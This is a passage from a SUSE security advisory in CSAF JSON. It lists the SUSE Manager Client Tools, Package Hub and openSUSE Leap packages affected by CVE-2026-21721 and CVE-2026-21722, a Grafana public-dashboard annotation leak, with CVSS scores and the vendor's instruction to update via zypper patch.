"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-21721",
"url": "https://www.suse.com/security/cve/CVE-2026-21721"
},
{
"category": "external",
"summary": "SUSE Bug 1257337 for CVE-2026-21721",
"url": "https://bugzilla.suse.com/1257337"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T10:11:52Z",
"details": "important"
}
],
"title": "CVE-2026-21721"
},
{
"cve": "CVE-2026-21722",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-21722"
}
],
"notes": [
{
"category": "general",
"text": "Public dashboards with annotations enabled did not limit their annotation timerange to the locked timerange of the public dashboard. This means one could read the entire history of annotations visible on the specific dashboard, even those outside the locked timerange.\n\nThis did not leak any annotations that would not otherwise be visible on the public dashboard.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-21722",
"url": "https://www.suse.com/security/cve/CVE-2026-21722"
},
{
"category": "external",
"summary": "SUSE Bug 1258136 for CVE-2026-21722",
"url": "https://bugzilla.suse.com/1258136"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
